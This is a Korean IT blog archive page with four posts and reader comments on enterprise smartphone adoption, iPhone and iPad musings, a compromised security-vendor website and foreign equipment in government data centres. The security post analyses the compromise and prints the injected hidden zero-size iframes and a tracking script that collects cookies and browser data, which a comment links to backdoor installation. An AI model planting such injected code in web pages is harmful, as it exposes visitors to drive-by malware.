'IT'에 해당되는 글 4건
- 2010/08/27 스마트폰의 도입은 기업을 망칠 수도 있다 (16)
- 2010/08/18 2010. 08. 18 이것저것 단상 (18)
- 2007/10/12 보안 제품을 사라는거야 말라는거야... (16)
- 2007/10/10 전자 정부가 외산장비 잔치? (2)
스마트폰의 도입은 기업을 망칠 수도 있다
신문이나 TV에서 쉽게 들을 수 있는 단어로 '스마트폰'이 있습니다. 마치 모든 기술의 집약체인 모습거 같은 스마트 폰입니다. 그리고 스마트 폰을 이용한 '스마트 오피스'라는 단어도 종종 들을 수 있고요. 이런 말이 나오는 것은 '스마트 폰을 어떻게 이용할까?'라는 매우 올바른 고민에서 나오고 있다고 생각합니다.
여기저기 많이 광고를 하고 실제 도입을 일부 하고 있는 곳이 많은 곳으로 아는데, 스마트 폰의 도입은 그렇게 쉬운 일이 아닙니다. 직업이 직업이다보니 스마트 폰의 도입같은 새로운 시스템을 도입한다고 결정이 났을 때에는 일이 순식간에 불어납니다. 새로운 시스템을 도입하면 기존 시스템과의 연동 문제나 실제 연동시 들어오는 수만가지 질문들을 어느 정도 예측하고 있어야 하니까 말이죠.
그래서, 이런 고민을 전혀 해본적 없이 언론에서 말하는 개념만 갖고 있는 분들과 이야기를 하다보면 너무나 큰 괴리에 빠집니다. 이론은 이론일 뿐, 현실에서는 상당히 다르게 나옵니다. 개인이 아닌 기업이 하는 스마트 폰의 도입은 단순히 스마트 폰을 직원에게 배포하는 것 이상의 일이 생깁니다. 심각한 부작용이 생기기도 하죠.
1. 이메일의 연동
현재 대부분의 회사 메일은 POP3와 IMAP을 지원합니다. 이 접속 방법이 표준이지만, 두 접속 방법은 모두 문제가 있습니다.
먼저 POP3를 보겠습니다. POP3 방식은 메일 클라이언트가 주기적으로 접속을 해서 메일을 갖고 오는 것입니다. 따라서 기본적으로 메일서버에는 메일이 남지 않습니다.
그 결과 메일은 PC와 스마트폰에 개별적으로 분리되어 존재하게 됩니다. 이에 대한 해법으로 모든 사용자는 메일 클라이언트의 설정에 메일 서버에 메시지 지우지 않음 옵션을 기본으로 설정해야 하며, 사용자의 입장에서는 메일을 어디까지 읽었는지에 대한 답은 없습니다.
이 경우 동기화 프로그램(액티브 싱크, 아이튠즈)를 이용해서 메일서버->아웃룩<->스마트폰 동기화를 구성한다면 별도의 복잡한 설정 없이 가능합니다. 문제는 메일을 실시간으로 받아볼 수 없다는데 있죠. (그래서 저는 별로 권하고 싶지 않습니다)
IMAP의 경우를 볼까요? IMAP은 서버에 메일을 남겨두고 이 메일을 그때그때 확인하는 방식으로 이뤄집니다. 이 방법은 POP3의 단점을 모두 커버할 수 있습니다. 그러나, 여기에도 문제가 발생합니다. 모든 메일은 메일 서버에 있으므로 1)서버의 저장공간 문제, 2)서버의 과부하문제가 발생합니다.
서버의 저장 공간 문제부터 생각해야 겠군요. 요즘 하드디스크가 쓰기 때문에 서버의 저장공간 문제는 비교적 쉽게 처리할 수 있을 것 같습니다. 그렇지만, 서버에 메일을 저장해야 하는 특성상 장기근속 직원의 메일함이 문제가 됩니다. 일정 주기를 두고 메일을 삭제하는 방법을 취해야 하나, 이 주기를 정하는 것이 매.우. 힘들거든요. (현실에서는 이거 하라고 해도 하는 직원도 거의 없습니다. -.ㅜ)
서버의 부하 문제는 저장 공간 문제보다 심각한데요. 스마트폰은 PC와는 다르게 24시간 접속을 합니다. 퇴근하면 확인 안하는 PC와는 다르죠. 그리고 회사에서 일을 하고 있을 때에도 접속을 합니다. 따라서 100명에게 스마트폰을 배포했다면 신규 사용자가 100명 늘어나는 겁니다. 별거 아닌거 같지만, IMAP은 메일함에 있는 메일 목록 전체를 갖고 오는 방법으로 메일을 확인합니다. 1000개쯤 되는 메일을 100명이 계속 확인하면 1000*100 의 부하가 메일서버에 걸리는 부하가 됩니다.
결국 단순히 메일만 확인하자는 생각으로 도입된 스마트 폰은 메일 서버에 몇 배의 저장 공간을 요구하는 기기이자 두 배의 사용자를 처리해야 하는 괴물로 변신하게 됩니다. 당연히 이런 부분을 처리하고 싶다면 돈을 더 내면 됩니다.
2. 보안, 외부에서의 접속
메일은 외부에서도 손쉽게 확인할 수 있을지라도 내부 인트라넷이나 각종 장비를 보호하기 위해서는 조금 고민을 해야합니다. 충분히 편리하면서 모든 사용자가 아닌, 인가된 사용자만 접속이 가능해야 하는 방법을 찾아야 하니까요.
이를 처리하는 가장 확실하고 안정된 방법은 VPN 접속을 허용하는 방법입니다. 하지만 VPN 장비를 도입할 때 역시 문제는 발생합니다. '1)몇 명의 사용자가 동시에 VPN을 통해 접속할 것인가?'라는 문제와 '2)접속할 사용자 계정은 어떻게 관리할 것인가?'라는 문제입니다.
'1)몇 명의 사용자가 동시에 붙는가?'가 중요한 이유는 VPN 장비의 대부분이 동시 접속자 수의 갯수만큼 비용을 계산하기 때문입니다. 무제한 연결을 자랑하는 장비는 어지간한 사람의 연봉을 훌쩍 뛰어넘습니다. 또한 스마트폰 사용자들이 종종 연결 후 끊는 것을 종종 잊어버리기도하고 PC보다 화면이 작고 느리다보니 오랫동안 연결하고 있습니다. (제 경우 대충 30% 정도의 접속 시간이 더 긴 것 같습니다)
'2)사용자 계정 문제'는 처음 도입시에는 발생하지 않고 2~3년 지나면 발생하는 심각한 문제입니다. 처음 도입시에는 간단하게 계정을 생성합니다. 하지만 그 사람이 조금 있다가 퇴사를 합니다. 새로운 사람도 옵니다. 이게 몇번 반복되면 잉여 사용자 계정과 공통의 비밀번호만 남게 됩니다. 1인이 사용할 수 있는 계정은 메일계정, 인트라넷 계정, VPN 계정, DB 접속 계정 등등 정말 다양하게 있는데, 이 계정들을 통합해서 관리할 수 있는 방법이 있어야만 합니다.
3. 인트라넷 연동
많은 기업이 내부에 결제나 공지사항을 알려주기 위한 인트라넷을 구축하고 있습니다. 하지만 IE 전용, 과도하게 복잡한 스크립트 사용, 과다 이미지 사용 등의 문제로 인해 인트라넷에 스마트폰에서 접속 할 수 없는 문제점을 갖고 있습니다. 이 부분을 해결하고자 별도로 개발하는 곳도 있지만, 결제가 이뤄지는 경우 부인방지 시스템이 연결되어 개발이 어렵게 됩니다. 모든 부분을 다 확인할 수 있지만 정작 중요한 행동을 할 수 없다? 이런 인트라넷이 정상적인 인트라넷은 아니죠.
4. 스마트 폰의 테스트 and 테스트 + 제한
국내에서 사용되는 스마트 폰은 역사가 짧다보니 몇 종류 안됩니다. 하지만, 화면의 해상도의 차이라던가 화면 크기에 따라 메뉴가 보이지 않아서 확인버튼을 누를 수 없다던가 특정 환경에서는 잘 보이지 않는다던가 등의 미묘한 차이가 있습니다. 별거 아닌 차이 같지만 의외로 큰 문제입니다. 주로 높은 분들이 이런 불만을 말하거든요. 그렇기 때문에 테스트를 철저히 해야 합니다.
그리고 접속하는 스마트 폰을 제한해야 합니다. 제한해야 한다는건 다른게 아닌 '회사 업무에 적합한 스마트 폰은 xx 와 xx입니다.'라고 공지하는 것이죠. 이 이외의 스마트 폰은 정상적으로 보이지 않아도 책임을 지지 않는다는 면죄부를 작성해야 합니다.
보통 이런 면죄부 작성에는 기기 제한만 하겠지만, 종종 회선도 확인해봐야 합니다. 몇몇 소프트웨어의 경우 WIFI+VPN 에서는 정상 동작하지만, 3G+VPN 에서는 동작하지 않을 수도 있거든요. 또는 데이터 통신이 불안정해서 VPN 연결이 비정상적인 경우도 있습니다. (제가 얼마 전에 들은 이야기로 특정 회사의 특정 제품이 VPN 접속이 잘 안된다는 이야기를 들었습니다. 회선의 문제일지 기기의 문제일지 확인해야 하는 것이지만 어찌됐든 결과는현재 접속할 수 없음으로 인한 사용 불가입니다.)
이런 문제 때문에 외국에서는 블랙베리를 업무용으로 사용한다는 이야기가 있는 것이겠지요. 블랙베리를 업무에 도입한 사례를 먼저 읽어보고 자사의 환경과 비교해보는게 먼저입니다.
5. 데이터의 오픈 수준, 분실에 대한 대비
회사에는 정말 많은 데이터가 흘러넘칩니다. 이게 작으면 몇 메가에 몇 원정도 밖에 안하는 데이터일 수도 있지만, 몇 메가에 수억이 되는 데이터일 수도 있습니다. 이런 용량이 크다면 스마트 폰에 담고 다니기란 어렵죠. 문제는 여기서 발생합니다. 스마트 폰은 만능의 머신도 아니며, 이런 데이터를 갖고 다닐 수는 있지만 언제나 분실의 위험이 있고, 담당자가 몰래 다른 업체에 관련 내용을 살짝 보여줄 수도 있습니다. 그래서 외부에서 언제든지 접속할 수 있는 방안을 마련해 두어야 하지요.
업무 처리 속도를 원활하고 빠르게 하는 다양한 방법으로 스마트 오피스를 도입하는 것도 좋지만, 이러한 새로운 시스템의 도입과 함께 고민해야 할 문제도 상당히 많다는 사실도 잊지 않았으면 합니다.
Trackback : http://www.daegul.com/trackback/2512087
-
라디오키즈 2010/08/27 11:47
기업쯤 되면 그리 가볍게 움직이진 않겠지만 기기로 발생할 수 있는 보안 위협보다 사용자가 만드는 보안 위협이 더 크다는 것도 잊지 않았으면 좋겠네요~
-
데굴대굴 2010/08/27 11:58
통칭 스마트 오피스의 도입은 작은 중소기업 쪽에서 업무량은 많고 사무실에 있을 시간은 적고 하니 성급하게 도입을 시도하더군요. 마구잡이로 도입한 다음에 '왜 안되냐?'라는 질문을 던지니까요. (왠지 이런 분을 보면 때려주고 싶다능...)
-
-
-
데굴대굴 2010/08/30 09:44
회사 내부에 무전기 도입이 절실합니다. 아.. 삐삐를 착용하는 것도 좋겠군요. (라고 말하고는 삐삐를 받으면 배터리를 살짝 빼둔다!)
그나저나 그녀야님을 위한 제품은 날이 슬슬 잡혀가는 것 같습니다. ㅋ
-
-
NoPD 2010/08/30 07:53
우리나라 기업의 정서상 "남의 서비스를 통해 우리 업무를? 입맛에도 안맞고(상무님,전무님,사장님의;;;) 보안도 문제야!" 라고 하기 일쑤이지요...
좋은건 쓰라고 있는거고 시장이 인정하는건 이유가 있어서인데
무조건 "우리들만의(우리의 특정 단말을 위한!)시스템"을 찾는건 이바닥에 들어온 이래 늘 갖고 있는 질문이지요; 쩝.-
데굴대굴 2010/08/30 09:50
남의 서비스를 우리 업무에 사용하는건 한국에서는 불가능입니다. 일단 이중장부가 불가능하기 때문에...;;; 그래서 한국의 IT는 길게 갈겁니다. (응?)
우리들만의 시스템이 존재하는 이상.. 아마 10년은 더 우려먹을 수 있을테니 우리는 어느 정도 잘 살수 있을겁니다. (아아아~ 더더욱 오래가야 하는데..)
-
-
별바람 2010/08/30 11:35
음..아무래도 저에게 선물로 주실 아이폰 4 는 무사히 결제하셨나보군요. 택배주소 알려드리면 되는겁니까? 아니면 제가 찾아가서 수령해가면 되나요? 어쨌든 데굴님 저를 위해 아이폰 4 까지 질러주시고..감사합니다ㅋ
-
강철지크 2010/08/30 20:35
스마트폰으로 메일 확인을 한다는게 또 그런 문제일수도 있겠군요.
대기업보다는 중소기업이 문제인걸까요?
대기업들은 도입하고 안되면 돈을 더 쓰면 그만이니...
(막상 대기업도 돈을 안쓰려고 아둥바둥하지만 말이죠)-
데굴대굴 2010/08/31 15:41
대기업은 워낙 시스템이 크고 방대하여 이런거 도입은 팀 단위로 이뤄집니다. 그리고 인원도 충분하고 돈도 많아서 별탈없이 가능합니다. 대기업은 O|X가 거의 명확하죠.
하지만 중소기업은 괜히 따라갈려고 하다가 큰 피해를 입죠. 단순한 생각이 재앙을 갖고 오는 수준이 되버리거든요...
알고보면 스마트 폰은 의외로 무서운 흉기(?)입니다...
-
-
그린B 2010/09/06 17:00
스마트폰을 통한 업무는 몇몇 부분에서는 긍정적인 부분이 분명 있습니다.
다만, 언제나 문제는 정작 자신이 뭘 필요로 하고 왜 필요한지는 모르면서 최신, 일등, 최고만을 쫓아가는 몇몇 높으신 분들이죠. -
대단하세요! 2011/04/04 10:18
좋은정보 감사드립니다 마침 리포트제출해야될게 잇엇는데 너무 도움이 되네요 참조해도괜찮겟죠 ..?
2010. 08. 18 이것저것 단상
자자자.. 이번에도 시간 없음을 핑계로 하는 단상 나플나플 읆조리는 시간이 왔습니다. (와아~~) 이번 단상 역시 IT나 최신 기기에 대한 내용이 다수.있습니다. 물론 살면서 느껴지는 그런 회의라던가 그런 것도 일부 있을 수. 있지요.
그나저나 이런 단편만 써서는 큰 마당에서 놀 수 없는데 말이죠. 음음. 역시 큰 인물이 되기 위해서는 대작을 마련해야..... ㄷㄷㄷ
- 애플TV에 대한 동영상을 보았다. 망할꺼 같다. TV라는게 누워서 리모콘으로 뚝딱뚝딱하는게 재미인데 이걸 버릴 것인가? 키보드를 붙이는 것보다 나은 인터페이스는 없나? 애플이 본격적인 터치 인터페이스를 만든 것처럼 신선한 것 말이다.
- 무엇이든 많이 사놓으면 이상하게 쓸 일이 없어진다. 그것이 생필품이라 할지라도...
- 집에서 아이패드에 한글 입력이 가능하게 된 이후로 일하는 경우와 결제버튼을 누르러 가는 경우를 제외하고는 윈도우가 설치된 PC를 키는 일이 없어졌다. -_-a
- 공인인증서를 3단계로 나눠서 제공한다는 기사가 나왔다. 한국의 IT 미래가 어두워졌다.
- LTE가 보급되고 2년 후쯤이면 지금은 개념과 상상속에서만 존재하는 클라우딩 컴퓨팅을 본격적으로 접할 수 있을 것이다. (2013년 중반 이후, 아마도 2014년이면 대충 나올 듯)
- 클라우딩 컴퓨팅이 되는 미래에는 나 뭘 먹고 살 수 있을까? 개발을 배워야 하나... 클라우딩 컴퓨팅은 멀지 않았다.
- 아이패드 3G 모델을 구입하지 않은걸 너무 다행으로 여기고 있다. 아이폰에서도 느린데, 이 큰 화면을 다 보여줄려면 3G로는...... -_-
- 개인적으로 타블랫 모델은 LTE가 나와야 본격적인 시작이라고 본다. 그 전까지는 어디까지나 노트북의 대용품 내지는 얼리어뎁터의 장난감.
- 누군가 아이패드에서 결제가 가능한 웹 브라우저를 만들어서 배포한다면 어떨까? (불가능하지 않다. 공인인증서 결제로 통일시키고 기본적으로 보안 모듈을 탑재한다면 은행거래나 증권 프로그램처럼 가능할 것 같은데..)
- 아이폰용 증권프로그램은 뭐가 좋은지 모르겠다. 계좌 만들기도 힘든데... (아이패드 대용 증권프로그램이 나오면 거기로 갈까?)
- 개인적으로 17인치 이하에서의 멀티태스킹은 불필요하다고 본다. 화면이 작아서 동시에 띄울 수가 없으니... 그냥 현 상태 저장이 10분정도 저장되어 있는 Fast Switching 정도만 되면....
- 아이폰 삼성으로 검색을 해보면 결과가 참 재미있다. 언론에서 이야기하는 것 vs 실제 사용자를이 이야기하는 것 and 외국 언론이 이야기 하는 것.
- 현재 잘 팔리는 스마트폰을 쓰게 되면 전보다 네이버와 조금 거리를 두게 되는건 거의 모든 사용자들의 공통점인가보다. 예전의 예상이 점차 맞는거 같다.
- 스마트폰 사용자들의 공통점은 MP3와 카메라를 안들고 다니기 시작했다는 것이다. 이제 이 부분에 있는 업체들은 어떤 활로로 가야 할 것인가가 궁금하다. (고가 정책일지 저가 정책일지, 아니면 기존 제품에 스마트폰의 기능을 탑재할지..)
- 아이패드로 일을 할 수 있을꺼라는 생각은 버려라. 아이패드는 어디까지나 가정용 또는 간단 업무 보조용이다. 업무 보조용으로 사용하기 위해서는 5000원이면 될 것이 50만원으로 튀어버린다.
- 아이폰4를 예약하고 말았다. 단 한번에 오류 없이 예약 완료. 문제는 3차라는거.. 랄라라. 이제는 빚쟁이~인생.
- 아이폰4가 이틀안에 10만대를 팔아치울 것 같다. 10만대를 얼마나 빨리 팔아치우는게 문제인게 아니라, 기존 3Gs사용자들이 승계로 넘어가는 수가 얼마나 되는지가 더 중요하다고 본다. 이들은 웃돈을 주고 넘어간다는 점과 다른 사람에게 아이폰이 얼마나 좋은지를 광고하고 다닌 마케터들이니까 말이다.
- 스마트폰으로 업무를 본다는 것에 IT쪽에 한껏 부풀은 사람들이 있는가본데... 그게 그리 쉬운 일이 아니다. (이 부분은 나중에 포스팅 예정)
- 개인적으로 스마트폰 전쟁은 윈도폰이 나오고 나서 본격적으로 진행될 것이라 본다. 일반 기업에 절대 강자인 MS가 자사 솔루션들 및 XBOX에 어떤 장치를 해놨을지....
- 구글 vs 페이스북의 전쟁을 이야기 하는 사람들이 있는데, 나는 왜 이게 구글 vs MS로 느껴지는지 모르겠다.
아.. 어서 정상적인 밀린 포스팅을 해야 하는데... 언제쯤 정리가 다 끝날려나..
Trackback : http://www.daegul.com/trackback/2512084
-
별바람 2010/08/18 17:08
데굴님께 예약배정된 아이폰4는 받고나서 보니 불량품이었다는 슬픈 진실이..그러나 하필이면 고장이 구입한지 30일 이후에 터지게 되는데..이러한 이유로 절대 환불못한다는 KT와 애플의 강압적인 태도에 수리받으러 다니며 눈물흘리실 데굴님의 모습이 눈앞에서 펼쳐지고 있습니다. 제가 예약을 놓쳐서 배 아파서 그러는것은 절대 맞습니다. 분명 받고나서 30일 이후에 거짓말같이 고장이 발생하게 되실겁니다ㅎㅎ
그리고 제가 아이폰 4 를 지를때 데굴님께서 흔쾌히 저를 대신해 결제를 해주실거라는 소문이 파다하게 돌고 있던데 사실이라고 믿고 있겠습니다.-
데굴대굴 2010/08/19 16:13
고장나면.. 리퍼입니다. ㅋ 랄라라~
그리고 아이폰 지르실때 제가 흔쾌히 별바람님의 카드로 결제해드리겠습니다. 사인 정도는 대충하면 되는걸요.
-
-
-
데굴대굴 2010/08/19 16:13
예. 맞습니다. 제가 대신 결제를 하는 룰이 있습니다. 문제는 이 룰에 따르면
사용가능한 본인의 신용카드를 맞겨야 한다
라고 되어 있습니다.
-
-
-
데굴대굴 2010/08/19 16:14
1. 요즘 시장 돌아가는걸 보면 정말 암담해지죠. 점차 나오는 툴들이 죄다 빌려쓰는 개념으로 바뀌다보니..... -_-a
2. 지르세요. 그러면 제가 이기는겁니다.
-
-
오월의미르 2010/08/19 08:59
아이폰4 예약에 마음이 동하긴했지만 화이트를 위해 참았습니다 ;ㅁ;
어제 봤을때가 13차던데 3차면 성공하셨네요 - 지름신이 불끈불끈 힘을 내고 있지만 그래도 참아볼래요. -
-
StarLight 2010/08/23 12:07
읔 요즘에 주변에서 다들 아이퐁아이퐁 하는데 저도 사야되려나; 왠지 대세 같아요 ㅋㅋ 핸드폰도 요즘 맛이 간지 꽤 됐고;; 그런데 아이패드가 생각보다 별로인가봐요?
-
데굴대굴 2010/08/24 10:24
아이패드는 써봐야 그 맛을 아는데, 위치가 진짜 애매합니다. 하지만 이 애매한 위치가 딱 필요한 그 위치라서 후회는 없고요. (물론 기대가 크다면 실망이 있겠죠)
뭔가 할 수는 있는데, 그 할 수 있는게 '아... 이 정도구나..'라는 느낌? 가정에서 넷북을 썻다면 그 위치를 충분히 대처하고 남습니다.
-
-
-
ascxXZc 2010/08/24 00:38
다바다 사용자인데요.
http://tv.joins.com/channel/tv_player.asp?mov_id=2007_0927_115754&categoryID=104001001&cloc=naver
http://www.diodeo.com/id=bumbum2&movie=000690857&pt_code=01
http://www.diodeo.com/id=stxclub2&movie=000690801&pt_code=01
3개 전부 같은 내용의 동영상인데요. 어떻게든 1개만 PC에 다운로드하고 싶은데 방법을 알 수없어서 정말 힘듭니다.
알툴바, 겟 투 플래시(?),다바다등으로 해봤는데 경로를 못 읽더군요. --;;
제발 다운받는 방법을 알려주시거나 tarrek@naver.com으로 보내주시면 감사하겠습니다. ㅠㅠ -
보안 제품을 사라는거야 말라는거야...
그래서 드라이브를 암호화 해보자..라는 생각을 말이죠. 제가 사용하는 Trancend JF110에도 전용 암호화 프로그램이 있긴 하지만, 파티션을 미리 나눠야 한다는 점 때문에 불편함이 있습니다.
그래서 바꿔볼 생각을 했습니다.
그래.. 국내 업체를 밀어줄까? 하고 생각했습니다만.........
이쪽 업계의 분위기상 어떤 이유에서인지 모르게 소프트웨어의 기능에 눈이 먼저 가는게 아니라 불쌍하다는 생각이 먼저 듭니다.
처음 시작하는 index.htm 파일 안에는...
<iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe><iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe>
라는 내용이 </html> 이후에 붙어 있으며, http://www.sayc1ub.com 에 접속하면
<iframe src="club.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="say.htm" width="0" height="0" frameborder="0"></iframe>
<a href="http://www.51.la/?1367935" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/1367935.asp" style="border:none" /></a>
<script language="javascript" src="http://count44.51yes.com/click.aspx?id=448562956&logo=1"></script>
라는 내용이 반겨주고... 이 사이트에서는 http://img.users.51.la/1367935.asp의 내용을 호출하는데, 그 내용은
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://web.51.la/s.asp?svid=43&id=1367935&style=0&vpage=http%3A%2F%2Fwww%2Esayc1ub%2Ecom%2F&29901.26.gif">here</a>.</body>
이고, 다시 연속적으로 http://count44.51yes.com/click.aspx?id=448562956&logo=1 를 호출 하는데... 그 내용은
var countid=448562956;var logo=1;
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
if(logo!=12)
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank>');
document.write('<img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count44.51yes.com/count'+ logo +'.gif" alt="51YES貢籃固셕溝固"></a>');}
else
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank title="51YES貢籃固셕溝固">직좆固셕</a>');}
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count44.51yes.com/sa.aspx?id='+countid+yesdata+' height=0 width=0></iframe>');
이군요. 쭉 몇단계 더 진행되며 더 추적할 수 있지만, 사실 귀찮습니다. 그냥 귀찮은 정도가 아니라 더 추적을 하는건 대.단.히.귀.찮.습.니.다. 하면 어떻게 동작할지도 뻔하게 아는 사실이고.....
보안 제품을 살까 하고 갔습니다만, 보안 제품 대신에 보안이 망가진 시스템을 구경하고 왔으니...... 흐음..... 아마 서버 관리자나 보안 관리자는 대단히 골치 아플듯 싶네요..
해당 제품의 개발사는 국내에 몇 손가락 안에 꼽는 소프트웨어 업체입니다. 보안쪽으로 많이 신경쓰고 있는 걸로 알고 있고, 얼마 전에 개인정보차단 솔루션도 만들었다고 해서 그럭저럭 괜찮은 이미지였는데, 이번 건으로 그다지 신뢰가 가지 않는군요. (사실 개인적으로 국내 대부분의 업체를 신뢰하지 않습니다. 관리는 잘 안하면서 너무 돈만 밝히는 듯한 이미지를 가지게 해서요.)
제가 말하고 싶은 최종 결론은....
하라는 거죠. 기본에 충실하지 않고, 빨리빨리를 외치며 완성품부터 요구하는 현실이 싫군요.
PS1. 제가 쓰는 USB 메모리 : 2006/03/02 - [지름] Trancend JF110 2G
PS2. 아.. 여기까지 보다가 귀찮아서 그냥 쓰던거 계속 쓰기로 했습니다. -_-a
Trackback : http://www.daegul.com/trackback/2511471
-
Subject 보안제품 사이트가 해킹을 당했군요.
2007/10/12 11:56
지란지교 소프트의 USBSAFE 사이트입니다. 이름하여 보안 소트프죠. 아래의 노랭이는 아시는분은 아실테지만 해킹을 당한 것입니다. 이번년도 중반에 저도 상당히 환장하며 봤던 메시지 입니다. (제가 근무하던 회사에 아주아주 잠깐 돌아서 한밤에 출동하던 일이 있었는데, 엔지니어들의 각고의 노력에 의해 바로 잡혔습니다.) IIS의 RDS 취약점을 이용한 공격인데, 한 번 걸리면 욕도 바가지로 먹거니와 끈질긴 해커들과의 대면식이 진행될 귀찮은 친구입니다...
-
Lane 2007/10/12 10:55
아이프레임 무지하게 써 놨군요.
IE 아니면 적용도 안되는 태그를...
초기화면 브라우저 상단 노란 상자가 나오는 거 보니 또 액티브 엑스 잔친가 보네요.
거참... 저에게는 요즘 저 노란 상자가 스펨 전화랑 비슷한 수준의 스트레스를 주더군요.-
데굴대굴 2007/10/12 12:01
액티브액스를 이용한 백도어 설치가 목적입니다. 상당히 고급기술입니다. 처음부터 끝까지 분석해보시면(하는 작업은 대단히 귀찮은 작업입니다. -_-), 자신의 스킬이 업되었다는 것을 느끼실 수 있을 정도 입니다.
-
-
-
dirtybit 2007/10/12 11:30
아아, 저거 한번 들어오면 -_-;
뭐랄까 참으로 피곤하더군요; -_-
어딘가 알수 없는 곳에 슬쩍 놓고 가는데 이거 뭐 어떻게 막아야 할지 참으로 난감하다는;;;
여차저차 해서 뭐 시스템 담당하는 분이 처리해서 저야 잘 모르지만, 확실히 여기저기 알게 모르게 저거 많이 걸려있는거 같더라구요. 제발 있는 기술, 기본 부터 제대로 알고 좀 뭔가 했으면 하는 생각입니다. -
-
Hee 2007/10/15 22:25
아...
외..외계어같아요..orz..
흠흠..
그래도 저 업체를 보니 신뢰는 안 가는 느낌이네요;;
보안이 망가진 시스템의 보안회사라니...ㅎㄷㄷ;; -
전자 정부가 외산장비 잔치?
(안봐도 탁상행정, 누군가를 질책하기 위한 수단, 이 기사가 실제로 이뤄지면 대박, 안되도 어쩔수 없는 것, 분야에 대한 경기 안 좋을 때 누군가 언급하기는 해야겠는데, 대충 숫자라는걸 통해 알고 싶기는 하고 그 분야가 어떤지는 잘 모르겠고...)
대충 내용은 국산 장비가 15%미만이니까, 국산 IT업체를 위해 사업을 하자는 의도인거 같은데... 기사의 내용으로...
정부통합전산1센터의 경우...
백업은 100%, 스토리지는 99.7%, 서버는 92.1%, 네트워크 장비는 96% 가 외산.
정부통합전산2센터의 경우...
네트워크 96%, 스토리지는 92.9%, 스토리지는 92%가 외산.
따라서, 국산 업체를 밀어주자.
흠... 근데 말이죠. 저는 정말 모르겠는데, 국내에 이런거 만드는 업체가 있긴 있습니까? 제 뜻은 그냥 "만들 수 있다"가 아니라 "운영해도 괜찮다" 내지는 "쓰다 문제 생기면 우리 업체에서 손해배상 하겠다"와 같은 수준의 기술을 갖춘 기업이 있는거냐는 말이죠.
한번 다운되면 국가 시스템이니까 재앙 수준의 피해가 발생하는 전산센터일텐데, 명시되어 있는 기능을 사용하다보면 언제 죽을지 몰라 노심초사해야하는 제품을 베타테스트 해보고 싶은겁니까?
조금 양보해서 완벽한 시스템과 그걸 운영할 수 있는 사람이 있고, 이 시스템을 운영하는 사용자의 잘못으로 시스템이 죽었다 합시다. 더구나, 이 시스템이 장애를 일으켰을 때 생기는 책임(=돈)을 면제해주겠다 했을 때(실제로 장애시 책임에 대해서 기업측에 일종의 보험금(?)을 요구합니다.), 이걸 공무원 입장에서 받아들일까요? 어찌되었든 자신의 임기 중에 발생한 중대 사건이므로, 자신의 승진에 문제를 일으킬 텐데요?
돈 몇 푼 쥐어주고, 죽어서는 안되는 시스템을 요구하며, 테스트 진행 중인 기술을 마치 완성된 기술인냥 사용하면서, 말도 안되는 이상한 구성도를 갖고와서 요구하고, 있는 시스템도 사용하지 못하면서, 가장 빠른 속도를 보여주는게 모든 기술인냥 하는 태도가 문제라고는 생각해보지 않으셨습니까?
높은 기술을 지니고 싶다면, 특정 업체를 밀어주기 위한 입찰이 아닌, 진짜 기술력이나 조건을 보고 입찰을 진행하는게 좋지 않을까요? 값을 싸게 진행하기 위한 입찰말고요.
그리고, 말도 안되는 이런 요구사항이라면, 차라리 Microsoft 사의 베타제품을 정품이라고 생각하고 쓰겠습니다. =_=
Trackback : http://www.daegul.com/trackback/2511468
-
Lane 2007/10/10 16:51
사실....
하드웨어만 외산에 경쟁력이 없는 게 아니죠.
소프트웨에도 이미 경쟁력이라 부를 만한 꺼리 조차 없어져 버렸죠.
꺼리가 아니라... 패키지 업체 자체가 없죠... (-_-)ㅋ
남은 건 오로지 컨트롤 씨 컨트롤 브이의 단순 노가다 일꺼리 와 막장 인생이라고까지 불리우는 열악한 근무환경뿐이 안남은게 우리나라 IT의 현실이죠.
IT강국은 개뿔...
